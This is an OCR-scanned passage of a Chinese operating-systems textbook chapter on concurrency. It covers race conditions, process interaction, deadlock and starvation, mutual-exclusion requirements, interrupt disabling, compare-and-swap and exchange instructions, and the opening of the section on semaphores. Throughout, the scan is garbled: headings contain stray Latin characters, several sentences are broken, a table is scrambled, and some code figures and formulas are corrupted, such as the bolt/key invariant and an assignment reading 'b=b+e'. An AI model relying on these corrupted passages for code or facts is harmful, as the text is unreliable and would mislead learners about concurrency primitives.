解决 方法 也 是 相同 的 。 首 先 ， 假设 没 有 机 制 来 控制 访问 共享 的 全 局 变量 : 

1) 进程 Pl 和 P2 分 别 在 一 个 单独 的 处 理 器 上 执行 ， 它 们 都 调用 了 echo 过 程 。 

2) 有 下 面 的 事件 发 生 ， 在 同一 行 的 事件 表示 是 同时 发 生 的 : 


进程 P1 进程 P2 
. ° 
chin = getchar(); . 
. chin = getchar(); 
chout = chin; chout = chin; 
putchar (chout); 人 
. putchar (chout); 


其 结果 是 输入 到 P1 的 字符 在 显示 前 丢失 ,输入 到 P2 的 字符 被 显示 在 Pl 和 P2 中 。 如 果 增 
加 “一 次 只 能 有 一 个 进程 处 于 echo 中 ”的 规则 ， 则 会 产生 以 下 的 执行 顺序 : 
1) 进程 P1 和 P2 分 别 在 一 个 单独 的 处 理 器 上 执行 ，P1 调用 了 echo 过 程 。 
2) 当 P1 Æ echo 过 程 中 时 ，P2 调用 echo, HF PI CAE echo 过 程 中 (不论 Pl 是 挂 起 
还 是 在 执行 )，P2 被 阻塞 不 能 进入 该 过 程 ， 因 此 P2 被 挂 起 ， 等 待 echo 过 程 可 用 。 
3) 一 段 时间 后 ， 进 程 P1 完成 echo 的 执行 ， 退 出 该 过 程 并 继续 执行 ， 在 Pl1 从 echo Pik 
出 的 同时 ，P2 立即 被 恢复 并 开始 执行 echo。 
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在 单 处 理 器 系统 的 情况 下 ， 出 现 问题 的 原因 是 中 断 可 能 会 在 进程 中 任何 地 方 停止 指令 的 执 
行 ; 在 多 处 理 器 系统 的 情况 下 , 不 仅 同样 的 条 件 可 以 引发 问题 ， 而 且 当 两 个 进程 同时 执行 并 且 都 
试图 访问 同一 个 全 局 变量 时 , 也 会 引发 问题 。 这 两 类 问题 的 解决 方案 是 相同 的 ; 控制 对 共享 资源 
的 访问 。 


5.1.2 ”竞争 条 件 


竞争 条 件 发 生 在 多 个 进程 或 线程 读 写 数据 时 ， 其 最 终 的 结果 依赖 于 多 个 进程 的 指令 执行 顺 
序 。 考 虑 下 面 两 个 简单 的 例子 。 

在 第 一 个 例子 中 ， 假 设 两 个 进程 Pl1 和 P 共享 全 局 变量 a。 在 某 一 执行 时 刻 ，P1 更 新 a 为 
1， 在 执行 的 另外 某 一 时 刻 ，P2 更 新 a 为 2。 因此 ， 两 个 任务 竞争 更 新 变量 a. AGH, RS 
的 “失败 者 ”( 也 就 是 最 后 更 新 全 局 变量 a 的 进程 ) 决定 了 变量 a 的 最 终 值 。 

在 第 二 个 例子 中 ， 考 虑 两 个 进程 P3 和 P4 共享 全 局 变量 b 和 c， 并 且 初 始 值 p=1，c=2。 在 
某 一 执行 时 刻 ，P3 执行 赋值 语句 b=b+e， 在 另 一 执行 时 刻 ，P4 执行 赋值 语句 c=b+c。 两 个 进程 
更 新 不 同 的 变量 , 但 两 个 变量 的 最 终 值 依赖 于 两 个 进程 执行 赋值 语句 的 顺序 。 如 果 P3 首先 执行 赋 
值 语句 ， 那 么 最 终 的 值 为 bp=3，c=5。 如 果 P4 首先 执行 赋值 语句 ， 那 么 最 终 的 值 为 b=4，c=3。 

附录 A 介绍 了 使 用 信号 量 解决 竞争 条 件 的 例子 。 


5.1.3 ”操作 系统 关注 的 问题 

并 发 会 带 来 哪些 设计 和 管理 问题 ? 如 下 所 示 : 

1 ) 操作 系统 必须 能 够 记 住 各 个 活跃 进程 ， 这 可 以 通过 使 用 第 4 章 介绍 的 进程 控制 块 来 实现 。 

2) 操作 系统 必须 为 每 个 活路 进程 分 配 和 释放 各 种 资源 。 有 了 时， 多 个 进程 都 想 访问 相同 的 资 
源 。 这 些 资源 包括 : 
o 处 理 器 时 间 : 这 是 调度 功能 ， 详 见 第 四 部 分 。 
© 存储 器 : 大 多 数 操作 系统 使 用 虚拟 存储 方案 ， 这 方面 内 容 将 在 第 三 部 分 讲述 。 
o 文件 : 在 第 12 章 讲 述 。 
@ VORB: 在 第 11 章 讲述 。 

3 ) 操作 系统 必须 保护 每 个 进程 的 数据 和 物理 资源 ， 避 免 其 他 进程 的 无 意 干涉 ， 这 涉及 与 存 
储 器 、 文 件 和 LO 设备 相关 的 技术 。 关 于 保护 的 通用 处 理 请 参阅 第 14 章 。 

4 ) 一 个 进程 的 功能 和 输出 结果 必须 与 执行 速度 相对 于 其 他 并 发 进程 的 执行 速度 ) 无 关 。 
这 是 本 章 的 主题 。 

为 理解 如 何 解决 与 执行 速度 无 关 的 问题 ， 我 们 首先 需要 考虑 进程 间 的 交互 方式 。 


5.1.4 进程 的 交互 
我 们 可 以 根据 进程 相互 之 间 知 道 对 方 是 否 存在 的 程度 ， 对 进程 间 的 交互 方式 进行 分 类 。 表 
5.2 列 出 了 三 种 可 能 的 知道 程度 以 及 每 种 程度 的 结果 : 
© 进程 之 间 相互 不 知道 对 方 的 存在 : 这 是 一 些 独立 的 进程 ， 它 们 不 会 一 起 工作 。 关 于 这 种 
情况 的 最 好 例子 是 多 个 独立 进程 的 多 道 程序 设计 ， 可 以 是 批 处 理 作 业 ， 也 可 以 是 交互 式 
的 会 话 ， 或 者 是 两 者 的 混合 。 尽 管 这 些 进程 不 会 一 起 工作 ， 但 操作 系统 需要 知道 它们 对 
. 资源 的 竞争 情况 。 例 如 ,两 个 无 关 的 应 用 程序 可 能 都 想 访 问 同 一 个 磁盘 、 文 件 或 打印 机 ， 
操作 系统 必须 控制 这 样 的 访问 。 
© 进程 间接 知道 对 方 的 存在 : 这 些 进程 并 不 需要 知道 对 方 的 进程 ID, 但 它们 共享 某 些 对 象 ， 
如 一 个 IO 缓冲 区 。 这 类 进程 在 共享 同一 个 对 象 时 表现 出 合作 行为 。 
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@ 进程 直接 知道 对 方 的 存在 :这 些 进程 可 以 通过 进程 ID 互相 通信 ,用 于 合作 完成 某 些 活 动 。 
同样 ， 这 类 进程 表现 出 合作 行为 。 


表 5.2 进程 的 交互 


















一 个 进程 对 其 他 进程 的 影响 
一 个 进程 的 结果 与 其 他 进程 的 活动 
竞争 无 关 

进程 的 执行 时 间 可 能 会 受到 影响 






潜在 的 控制 问题 
HR 
死 锁 (可 复 用 的 资源 ) 
IUR 

a 

死 锁 (可 复 用 的 资源 ) 
UR 

数据 一 致 性 





进程 之 间 不 知道 对 方 
的 存在 











一 个 进程 的 结果 可 能 依赖 于 从 其 他 
通过 共享 合作 进程 获得 的 信息 
进程 的 执行 时 间 可 能 会 受到 影响 


进程 间接 知道 对 方 的 
存在 〈 如 共享 对 象 ) 
















进程 直接 知道 对 方 
《它们 有 可 用 的 通信 原 


语 ) 


一 个 进程 的 结果 可 能 依赖 于 从 其 他 
通过 通信 合作 进程 获得 的 信息 
。 进程 的 计时 可 能 会 受到 影响 


FOB (可 消费 的 资源 ) 
。 饥饿 











实际 条 件 并 不 总 是 像 表 5.2 中 给 出 的 那么 清晰 , 几 个 进程 可 能 既 表 现 出 竞争 , 又 表现 出 合作 。 
然而 ， 对 操作 系统 而 言 ， 分 别 检查 表 中 的 每 一 项 并 确定 它们 的 本 质 是 必要 的 。 


进程 间 的 资源 竞争 

当 并 发 进程 竞争 使 用 同一 资源 时 ,它们 之 间 会 发 生 冲 突 。 我 们 可 以 把 这 种 情况 简单 描述 如 下 : 
两 个 或 更 多 的 进程 在 它们 的 执行 过 程 中 需要 访问 一 个 资源 ， 每 个 进程 并 不 知道 其 他 进程 的 存在 ， 
并 且 每 个 进程 也 不 受 其 他 进程 的 影响 。 每 个 进程 都 不 影响 它 所 使 用 的 资源 的 状态 , 这 类 资源 包括 
IO 设备 、 存 储 器 、 处 理 器 时 间 和 时 钟 。 

竞争 进程 间 没 有 任何 信息 交换 , 但 是 , 一 个 进程 的 执行 可 能 会 影响 到 竞争 进程 的 行为 。 特 别 
是 当 两 个 进程 都 期 望 访问 同一 个 资源 的 时 候 , 如 果 操 作 系 统 把 这 个 资源 分 配给 一 个 进程 , 那么 另 
一 个 就 必须 等 待 。 因 此 ,被 拒绝 访问 的 进程 执行 速度 就 会 变 慢 。 一 种 极端 情况 是 ,被 阻塞 的 进程 
永远 不 能 访问 这 个 资源 ， 因 此 该 进程 永远 不 能 成 功 地 结束 运行 。 

竞争 进程 面临 三 个 控制 问题 。 首 先是 互 斥 的 要 求 。 假设 两 个 或 更 多 的 进程 需要 访问 一 个 不 可 
共享 的 资源 ， 如 打印 机 。 在 执行 过 程 中 ,每 个 进程 都 给 该 IO 设备 发 命令 ,接收 状态 信息 ,发送 
数据 和 接收 数据 。 我 们 把 这 类 资源 称 做 临界 资源 , 使 用 临界 资源 的 那 一 部 分 程序 称 做 程序 的 临界 
区 。 一 次 只 允许 有 一 个 程序 在 临界 区 中 , 这 一 点 是 非常 重要 的 。 由 于 不 清楚 详细 要 求 ， 我 们 不 能 
仅仅 依靠 操作 系统 来 理解 和 实施 这 个 限制 。 例 如 在 打印 机 的 例子 中 , 我 们 希望 任何 一 个 进程 在 打 
印 整个 文件 时 都 拥有 打印 机 的 控制 权 ， 否 则 在 打印 结果 中 就 会 穿插 着 来 自 竞争 进程 的 打印 内 容 。 

实施 互 斥 产 生 了 两 个 额外 的 控制 问题 。 一 个 是 死 锁 。 例 如， 考虑 两 个 进程 Pl 和 P2， 以 及 两 
个 资源 RI 和 R2。 假 设 每 个 进程 为 执行 部 分 功能 都 需要 访问 这 两 个 资源 ， 那 么 就 有 可 能 出 现下 
列 情况 ， 操作 系统 把 RI 分 配给 P2, 把 R2 分 配给 P1， 每 个 进程 都 在 等 待 另 一 个 资源 ， 且 在 获得 
其 他 资源 并 完成 功能 前 ， 谁 都 不 会 释放 自己 已 经 拥有 的 资源 。 这 两 个 进程 发 生死 锁 。 

另 一 个 控制 问题 是 饥饿 。 假 设 有 三 个 进程 (P1、P2 和 P3 ), 每 个 进程 都 周期 性 地 访问 资源 Ro 
考虑 这 种 情况 ，P1 拥有 资源 ，P2 和 P3 都 被 延迟 ,等待 这 个 资源 。 当 Pl1 退出 它 的 临界 区 时 ，P2 
和 P3 都 被 允许 访问 R。 假设 操作 系统 把 访问 权 授 予 P3, 并 且 在 P3 完成 临界 区 之 前 Pl 又 需要 访 
问 该 临界 区 。 如 果 在 P3 结束 后 操作 系统 又 把 访问 权 授 予 P1， 并 且 接 下 来 把 访问 权 轮 流 授予 P1 
和 P3， 那 么 即使 没有 死 锁 ，P2 也 可 能 被 无 限期 地 拒绝 访问 资源 。 

由 于 操作 系统 负责 分 配 资源 ,因此 对 竞争 的 控制 不 可 避免 地 涉及 操作 系统 。 此 外 ,进程 自身 
需要 能 够 以 某 种 方式 表达 对 互 斥 的 要 求 , 如 在 使 用 前 对 资源 加 锁 , 但 任何 一 种 解决 方案 都 涉及 操 
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作 系 统 的 某 些 支持 ， 如 提供 锁 机 制 。 图 5.1 用 抽象 术语 给 出 了 互 斥 机 制 。 假设 有 n 个 进程 并 发 执 
行 ， 每 个 进程 包括 了 在 某 资源 Ra 上 操作 的 临界 区 以 及 不 涉及 资源 Ra 的 其 他 代码 。 因 为 所 有 的 
进程 都 需要 访问 同一 资源 Ra, 因此 在 某 一 时 刻 只 有 一 个 进程 在 临界 区 是 很 重要 的 。 为 实施 互 斥 ， 
需要 两 个 函数 : entercritical 和 exitcritical。 每 个 函数 的 参数 都 是 竞争 使 用 的 资源 名 。 
如 果 一 个 进程 在 它 的 临界 区 中 ， 那 么 其 他 任何 试图 进入 临界 区 的 进程 都 必须 等 待 。 


/* 进程 1*/ /* 进程 2*/ 
void P1 void P2 
{ { 
while (true) { while (true) { 
/* 处 理 代码 /; /* 处 理 代码 */; 


/* 进 程 n */ 
void Pn 


{ 


while (true) { 
/* 处 理 代 码 */; 


entercritical (Ra); entercritical (Ra});| ves ” entercritical (Ra); 
/* 临界 区 «/; /* 临界 区 */; /* 临界 区 */; 
exitcritical (Ra); exitcritical (Ra); exitcritical (Ra); 


/* 其 他 代码 */; /* 其 他 代码 */; /* 其 他 代码 */; 











图 5.1 互 斥 机 制 


下 面 还 需要 继续 分 析 函 数 entercritical 和 exitcritical 的 具体 机 制 , 我 们 暂时 把 它 
推迟 到 讨论 另 一 种 进程 的 交互 情况 之 后 。 
进程 间 通 过 共享 合作 

通过 共享 进行 合作 的 情况 ， 包 括 进 程 间 在 互相 并 不 确切 知道 对 方 的 情况 下 进行 交互 。 例 如 ， 
多 个 进程 可 能 访问 一 个 共享 变量 、 共 享 文件 或 数据 库 , 进程 可 能 使 用 并 修改 共享 变量 而 并 不 涉及 
其 他 进程 ,但 却 知 道 其 他 进程 也 可 能 访问 同一 个 数据 。 因 此 ,这 些 进程 必须 合作 ， 以 确保 它们 共 
享 的 数据 得 到 正确 的 管理 。 控 制 机 制 必须 确保 共享 数据 的 完整 性 。 

由 于 数据 保存 在 资源 中 (设备 或 存储 器 )， 因 此 再 次 涉及 有 关 互 斥 、 死 锁 和 饥 饭 等 控制 问题 。 
唯一 的 区 别 是 可 以 以 丙种 不 同 的 模式 〈 读 和 写 ) 访问 数据 项 ， 并 且 只 有 写 操作 必须 保证 互 斥 。 

但 是 ， 除 这 些 问题 之 外 还 有 一 个 新 要 求 : 数据 的 一 致 性 。 举 个 简单 的 例子 ,考虑 一 个 关于 记 
账 的 应 用 程序 ， 在 这 个 程序 中 可 能 会 修改 各 种 数据 项 。 假 设 两 个 数据 项 a 和 保持 着 相等 关系 
a=b， 也 就 是 说 ， 为 保持 这 个 关系 ， 任 何 一 个 程序 如 果 修 改 了 其 中 一 个 变量 ， 也 就 必须 修改 另 一 
个 。 现 在 来 看 下 面 两 个 进程 : 


Pl: 


a= a+ l; 

b =b + 1; 
P2.: 

b 2 * b; 


"oO H 


a 2 * a; 
如 果 最 初 状态 是 一 致 的 , 则 单独 执行 每 个 进程 会 使 共享 数据 仍然 保持 一 致 状态 。 现 在 考虑 下 
面 的 并 发 执行 ， 两 个 进程 在 每 个 数据 项 (a 和 4b) 上 都 考虑 到 了 互 斥 : 


a= a+ l; 
b = 2 * b; 
b = b + 1; 


a=2* a; 

按照 这 个 执行 顺序 ,结果 不 再 保持 条 件 a=b。 例 如 ,开始 时 有 a=b=1， 在 这 个 执行 序列 结束 
时 有 a=4 和 b=3。 为 避免 这 个 问题 ， 可 以 把 每 个 进程 中 的 整个 序列 声明 成 一 个 临界 区 。 

因此 , 在 通过 共享 进行 合作 的 情况 下 , 临界 区 的 概念 是 非常 重要 的 , 前 面 曾 讲述 到 的 抽象 函 
数 entercritical 和 exitcritical ( 见 图 5.1) 也 可 以 用 在 这 里 。 这 种 情况 下 ， 该 函数 的 
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参数 可 能 是 一 个 变量 、 一 个 文件 或 任何 其 他 共享 对 象 。 此 外 , 如 果 使 用 临界 区 来 保护 数据 的 完整 
性 , 则 没有 确定 的 资源 或 变量 可 作为 参数 。 在 这 种 情况 下 , 可 以 把 参数 看 做 是 一 个 在 并 发 进程 间 
共享 的 标识 符 ， 用 于 标识 必须 互 斥 的 临界 区 o 

进程 间 通 过 通信 合作 

在 前 面 两 种 情况 下 , 每 个 进程 有 自己 独立 的 环境 , 不 包括 其 他 进程 , 进程 间 的 交互 是 间接 的 ， 
并 且 都 存在 共享 。 在 竞争 的 情况 下 , 它们 在 不 知道 其 他 进程 存在 的 情况 下 共享 资源 ; 在 第 二 种 情 
AF, 它们 共享 变量 , 每 个 进程 并 未 明确 地 知道 其 他 进程 的 存在 , 它 只 知道 需要 维护 数据 的 完整 
性 。 当 进程 通过 通信 进行 合作 时 , 各 个 进程 都 与 其 他 进程 进行 连接 , 通信 提供 了 同步 和 协调 各 种 
活动 的 方法 。 

在 典型 情况 下 , 通信 可 由 各 种 类 型 的 消息 组 成 , 发 送 消息 和 接收 消息 的 原 语 由 程序 设计 语言 
提供 ， 或 者 由 操作 系统 的 内 核 提供 。 

由 于 在 传递 消息 的 过 程 中 进程 间 没有 共享 任何 对 象 , 因而 这 类 合作 不 需要 互 斥 , 但 是 仍然 存 
在 死 锁 和 饥 铁 的 问题 。 例 如 有 两 个 进 穆 可 能 都 被 阻塞 每 个 都 在 等 待 来 自 对 方 的 通信 ,这 时 发 生 
死 锁 。 作 为 饥饿 的 例子 ， 考 虑 三 个 进程 P1、P2 和 P3， 它 们 都 有 如 下 的 特性 ，P1 不 断 地 试图 与 
P2 或 P3 通信 ，P2 和 P3 都 试图 与 Pl 通信 ， 如 果 Pl 和 P2 不 断 地 交换 信息 ， 而 P3 一 直 被 阻塞 ， 
等 待 与 P1 通信 ， 由 于 P1 一 直 是 活跃 的 ， 因 此 虽 不 存在 死 锁 ， 但 P3 SbF ORR. 


5.1.5 EREK 


为 了 提供 对 互 斥 的 支持 ， 必 须 满 足以 下 要 求 : 
1) 必须 强制 实施 互 斥 : 在 与 相同 资源 或 共享 对 象 的 临界 区 有 关 的 所 有 进程 中 ， 一 次 只 人 允许 
一 个 进程 进入 临界 区 。 

2) 一 个 在 非 临界 区 停止 的 进程 不 能 干涉 其 他 进程 。 

3) 决 不 允许 出 现 需 要 访问 临界 区 的 进程 被 无 限 延 迟 的 情况 ， 即 不 会 产生 死 锁 或 饥饿。 

4) 当 没 有 进程 在 临界 区 中 时 ,任何 需要 进入 临界 区 的 进程 必须 能 够 立即 进入 。 

5 ) 对 相关 进程 的 执行 速度 和 处 理 器 的 数目 没有 任何 要 求 和 限制 。 

6) 一 个 进程 驻 留 在 临界 区 中 的 时 间 必 须 是 有 限 的 。 

有 许多 种 方法 都 可 以 满足 这 些 互 斥 条 件 。 一 种 方法 是 让 由 并 发 执行 的 进程 担负 这 个 责任 , 这 
类 进程 , 不论 是 系统 程序 还 是 应 用 程序 ,都 需要 与 另 一 个 进程 合作 , 而 不 需要 程序 设计 语言 或 操 
作 系 统 提供 任何 支持 来 实施 互 斥 。 我们 把 这 类 方法 称 做 软件 方法 。 尽管 该 方法 已 经 被 证 明 会 增加 
开销 和 缺陷 , 但 通过 分 析 这 类 方法 ,可 以 更 好 地 理解 并 发 处 理 的 复杂 性 ， 详 见 附录 A。 第 二 种 方 
法 涉及 专门 的 机 器 指令 ， 这 种 方法 的 优点 是 可 以 减少 开销 ， 但 却 很 难 成 为 一 种 通用 的 解决 方案 ， 
详 见 5.2 节 。 第 三 种 方法 是 在 操作 系统 或 程序 设计 语言 中 提供 某 种 级 别 的 支持 ， 从 5.3 节 到 5.5 
节 讲 述 了 这 类 方法 中 最 重要 的 三 种 方法 。 


5.2 BR: 硬件 的 支持 


许多 增强 互 斥 的 软件 算法 已 经 开发 出 来 了 。 软 件 方法 会 带 来 高 开销 并 且 很 容易 产生 人 逻辑 错 
TR. 然而 讨论 这 些 算法 可 以 阐述 在 开发 并 发 程序 中 许多 基本 的 概念 和 潜在 的 问题 。 对 于 有 兴趣 的 
读者 ， 附 录 A 包含 了 软件 方法 的 讨论 ， 在 本 节 将 讨论 几 种 实现 互 斥 的 硬件 方法 。 


5.2.1 中断 禁 用 


在 单 处 理 器 机 器 中 ,并 发 进程 不 能 重 登 ， 只 能 交替 。 此 外 , 一 个 进程 将 一 直 运 行 ， 直 到 它 调 
用 了 一 个 系统 服务 或 被 中 断 。 因 此 为 保证 互 斥 ， 只 需要 保证 一 个 进程 不 被 中 断 就 可 以 了 , 这 种 能 
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力 可 以 通过 系统 内 核 为 启用 和 禁用 中 断定 义 的 原 语 来 提供 ,一 个 进程 可 以 通过 下 面 的 方法 实施 互 
Fe ( GES 5.1 对 比 ); 
while (true) 
{ 
/* 禁用 中 断 */; 
/* 临界 区 */; 
/* 启用 中 断 */， 
/* 其 余部 分 */; 


} 

由 于 临界 区 不 能 被 中 断 ， 所 以 可 以 保证 互 斥 。 但 是 , 该 方法 的 代价 非常 高 ， 由 于 处 理 器 被 限 
制 于 只 能 交替 执行 程序 , 因此 执行 的 效率 将 会 有 明显 的 降低 。 第 二 个 问题 是 该 方法 不 能 用 于 多 处 
理 器 结构 中 ， 当 一 个 计算 机 系统 包括 多 个 处 理 器 时 ， 就 有 可 能 ( 典型 地 ) 有 一 个 以 上 的 进程 同时 
执行 ， 在 这 种 情况 下 ， 禁 用 中 断 是 不 能 保证 互 斥 的 。 


5.2.2 专用 机 器 指令 


在 多 处 理 器 配置 中 ， 几 个 处 理 器 共享 内 存 。 在 这 种 情况 下 ， 不 存在 主 /从 关系 ,处 理 器 间 的 
行为 是 无 关 的 ， 表 现 出 一 种 对 等 关系 ， 处 理 器 之 间 没 有 支持 互 斥 的 中 断 机 制 。 

在 硬件 级 别 上 , 对 存储 单元 的 访问 排斥 对 相同 单元 的 其 他 访问 。 基 于 这 一 点 , 处 理 器 的 设计 
者 握 出 了 一 些 机 器 指令 , 用 于 保证 两 个 动作 的 原子 性 9 ， 如 在 一 个 取 指 令 周 期 中 对 一 个 存储 器 单 
元 的 读 和 写 或 者 读 和 测试 。 在 该 指令 执行 的 过 程 中 , 任何 其 他 指令 访问 内 存 将 被 阻止 。 而 且 这 些 
动作 在 一 个 指令 周期 中 完成 。 

本 节 给 出 了 两 种 最 常见 的 指令 ， 有 关 其 他 指令 的 描述 详 见 [RAYN86 ] 和 [ STON93 ]。 
比较 和 交换 指令 

比较 和 交换 指令 定义 如 下 [HERL90] : 


int compare_and_swap (int *word, int testval, int newval) 


int oldval; 

oldval = *word 

if (oldval == testval) *word = newval; 
return oldval; l 


} 

该 指令 的 一 个 版 本 是 用 一 个 测试 值 ( testval ) 检查 一 个 内 存单 元 (*wora ) 。 如 果 该 内 
存单 元 的 当前 值 是 testval， 就 用 newval 取代 该 值 ; 否则 保持 木 变 。 该 指令 总 是 返回 旧 内 存 
值 ; 因此 ， 如 果 返 回 值 与 测试 值 相 同 ， 则 表示 该 内 存单 元 已 被 更 新 。 由 此 可 见 ， 这 个 原子 指令 由 
两 个 部 分 组 成 : 比较 内 存单 元 值 和 测试 值 ; 如 果 值 有 差异 ， 则 产生 交换 。 整 个 比较 和 交换 功能 按 
原子 操作 执行 ， 即 它 不 接受 中 断 。 

该 指令 的 另 一 个 版 本 返回 一 个 布尔 (Boolean ) 值 : 交换 发 生 时 为 真 (true ); 否则 为 假 ( false )。 
几乎 所 有 处 理 器 家 族 ( x86、IA64、sparc、/390 等 ) 中 都 支持 该 指令 的 某 个 版 本 ， 而 且 多 数 操作 
系统 都 利用 该 指令 支持 并 发 。 

图 5.2a 给 出 了 基于 使 用 这 个 指令 的 互 斥 规程 9 。 共 享 变量 bolt 被 初始 化 为 0。 唯一 可 以 进 
入 临界 区 的 进程 是 发 现 bolt 等 于 0 的 那个 进程 。 所 有 试图 进入 临界 区 的 其 他 进程 进入 忙 等 待 


O 术语 “原子 ”表示 不 能 被 中 浙 的 单个 步 又 的 指令 。 
© parbegin(P1,P2,---, Pr) MUP: 挂 起 主 程序 ,初始 化 并 行 过 程 P1,P2,…, Pn， 当 P1,P2,…, Pn 过 程 全 部 终止 之 
后 ， 才 恢复 主 程序 执行 。 
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模式 。 术 语 忙 等 待 busy waiting) 或 者 自 旋 等 待 ( spin waiting) 指 的 是 这 样 一 种 技术 : 进程 在 
得 到 临界 区 访问 权 之 前 ， 它 只 能 继续 执行 测试 变量 的 指令 来 得 到 访问 权 ， 除 此 之 外 不 能 做 其 他 
事情 。 当 一 个 进程 离开 临界 区 时 , CE bolt 重 置 为 0, 此 时 只 有 一 个 等 待 进程 被 允许 进入 临界 
区 。 进 程 的 选 树 取决 于 哪个 进程 正好 执行 紧 接着 的 比较 和 交换 指令 。 


/* program mutualexclusion */ 
const int n = /* 进程 个 数 */; 
int bolt; 

void P(int i) 

{ 


while (true) { 


== 1) 

/* 不 做 任何 事 */; 
/* 临界 区 */; 
bolt = 0; 


/* 其 余部 分 */; 





while (compare_and_swap(bolt, 0, 1) 


/* program mutualexclusion */ 


int const n = /* 进程 个 数 **/; 

int bolt; 

void P(int i) 

{ 
int keyi = 1; 
while (true) { 


do exchange (keyi, 
while (keyi != 0); 
/* 临界 区 */; 

bolt = 0; 


/* 其 余部 分 */; 


bolt) 


} 】 
} } 
void main() void main() 
{ { 

bolt = 0; bolt = 0; 

parbegin (P(1), P(2), »P(n)); parbegin (P(1), P(2), 


Lee ， Lay Pens] 
} } 


a) 比较 和 交换 指令 b ) 交换 指令 

















图 5.2 ”对 互 斥 的 硬件 支持 


exchange 指令 
exchange 指令 定义 如 下 : 


void exchange(int register, 


{ 


int memory) 


int temp; 


temp = memory; 


memory = register; 


register = temp; 


} 
该 指令 交换 一 个 寄存 器 的 内 容 和 一 个 存储 单元 的 内 容 。Intel IA-32 体系 结构 (Pentium ) 和 [A-64 
体系 结构 (Itanium ) 都 含有 XCHG 指令 。 

图 5.2b 显示 了 基于 exchange 指令 的 互 斥 协议 : 共享 变量 bolt 被 初始 化 为 0， 每 个 进程 都 使 
用 一 个 局 部 变量 key 且 初 始 化 为 1。 唯 一 可 以 进入 临界 区 的 进程 是 发 现 bolt 等 于 0 的 那个 进程 。 
它 通过 把 bolt 置 为 1 排斥 所 有 其 他 进程 进入 临界 区 。 当 一 个 进程 离开 临界 区 时 ， 它 把 bolt 重 置 
为 0， 人 允许 另 一 个 进程 进入 它 的 临界 区 。 

注意 ， 由 于 变量 初始 化 的 方式 以 及 exchange 算法 的 本 质 ， 下 面 的 表达 式 总 是 成 立 的 : 

bolt + key; =n 


如 果 bolo, NRAEA-THBECH OARS; 如 果 boll, WRA-TPHBAMAKP, 
即 key 的 值 等 于 0 的 那个 进程 。 
机 器 指令 方法 的 特点 

使 用 专门 的 机 器 指令 实施 互 斥 有 以 下 优点 : 

o 适用 于 在 单 处 理 器 或 共享 内 存 的 多 处 理 器 上 的 任何 数目 的 进程 。 

@ 非常 简单 且 易 于 证 明 。 
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@ 可 用 于 支持 多 个 临界 区 ， 每 个 临界 区 可 以 用 它 自 己 的 变量 定义 。 

但 是 ， 也 有 一 些 严重 的 缺点 ; 

@ 使 用 了 忙 等 待 。 因 此 ， 当 一 个 进程 正在 等 待 进入 临界 区 时 ， 它 会 继续 消耗 处 理 器 时 间 。 

@ 可 能 饥饿 。 当 一 个 进程 离开 一 个 临界 区 并 且 有 多 个 进程 正在 等 待 时 ， 选 择 哪 一 个 等 待 进 
程 是 任意 的 ， 因 此 ， 某 些 进程 可 能 被 无 限期 地 拒绝 进入 。 

@ 可 能 死 锁 。 考 虑 单 处 理 器 中 的 下 列 情况 。 进 程 P1 执行 专门 指令 (如 comparesswap, 
exchange ) 并 进入 临界 区 ,然后 Pl 被 中 断 并 把 处 理 器 让 给 具有 更 高 优先 级 的 P2。 如 
R P2 试图 使 用 同一 资源 , 由 于 互 斥 机 制 , 它 将 被 拒绝 访问 。 因此 , 它 会 进入 忙 等 待 循环 。 
但 是 ， 由 于 P1 比 P2 的 优先 级 低 ， 它 将 永远 不 会 被 调度 执行 。 

由 于 前 面 给 出 的 软件 方法 和 硬件 方法 都 存在 着 缺陷 ， 我 们 需要 寻找 其 他 机 制 。 


5.3 信号 量 


现在 转向 讨论 操作 系统 和 用 于 提供 并 发 性 的 程序 设计 语言 机 制 。 表 5.3 总 结 了 一 般 常用 的 机 
制 。 本 节 首 先 讨 论 信号 量 , 后 续 两 节 分 别 讨论 管 程 和 消息 传递 。 表 5.3 中 其 他 的 机 制 在 第 6 章 和 
第 13 章 具 体 讨论 操作 系统 实例 时 予以 介绍 。 


R53 常用 并 发 机 制 


并 发 机 制 说 BA 
用 于 进程 间 传 递 信号 的 一 个 整数 值 。 在 信号 量 上 只 有 三 种 操作 可 以 进行 ， 初始化、 递减 和 增加 ， 
aoe 这 三 种 操作 都 是 原子 操作 。 递 减 操 作 可 以 用 于 阻塞 一 个 进程 ， 增 加 操作 可 以 用 于 解除 阻塞 一 个 进 
程 。 也 称 为 计数 信号 量 或 一 般 信 号 量 
二 元 信号 量 只 取 0 值 和 1 值 的 信号 量 
a 类 似 于 二 元 信号 量 。 关 键 区 别 在 于 为 其 加 锁 (REA 0) 的 进程 和 为 其 解锁 〈 设 定 值 为 1 ) 的 
进程 必须 为 同一 个 进程 
条 件 变 量 一 种 数据 类 型 ， 用 于 阻塞 进程 或 者 线程 ， 直 到 特定 的 条 件 为 真 
一 种 编程 语言 结构 ， 在 一 个 抽象 数据 类 型 中 封装 了 变量 、 访 问 过 程 和 初始 化 代码 。 管 程 的 变量 
管 程 只 能 由 管 程 自己 的 访问 过 程 来 访问 ， 每 次 只 能 有 一 个 进程 在 其 中 执行 。 访 问 过 程 即 临 界 区 。 管 程 


可 以 有 一 个 等 待 进程 队列 
作为 同步 机 制 的 一 个 内 存 字 。 应 用 程序 代码 可 以 为 标志 中 的 每 个 位 关联 不 同 的 事件 。 通 过 测试 


事件 标志 | 相关 的 一 个 或 多 个 位 ， 线 程 可 以 等 待 一 个 事件 或 多 个 事件 。 在 全 部 的 所 需 位 都 被 设 定 CAND) 或 
者 至 少 一 个 位 被 设 定 ( OR ) 之 前 线程 会 一 直 被 阻塞 

信箱 /消息 两 个 进程 交换 信息 的 一 种 方法 ， 也 可 以 用 于 同步 

自 旋 锁 一 种 互 斥 机 制 ， 进 程 在 一 个 无 条 件 循环 中 执行 ,等 待 锁 变量 的 值 变 为 可 用 


在 解决 并 发 进程 问题 的 过 程 中 ， 第 一 个 重要 的 进展 是 1965 年 Dijkstra 的 论文 [ DIJK65 ]。 
Dijkstra 参与 了 一 个 操作 系统 的 设计 ， 该 操作 系统 设计 为 一 组 合作 的 顺序 进程 ， 并 为 支持 合作 提 
供 了 有 效 可 靠 的 机 制 。 只 要 处 理 器 和 操作 系统 使 这 些 机 制 成 为 可 用 , 那么 它们 可 以 很 容易 地 被 用 
户 进程 使 用 。 

其 基本 原理 是 : 两 个 或 多 个 进程 可 以 通过 简单 的 信号 进行 合作 , 一 个 进程 可 以 被 迫 在 某 一 位 
置 停止 , 直到 它 接收 到 一 个 特定 的 信号 。 任何 复杂 的 合作 需求 都 可 以 通过 适当 的 信号 结构 得 到 满 
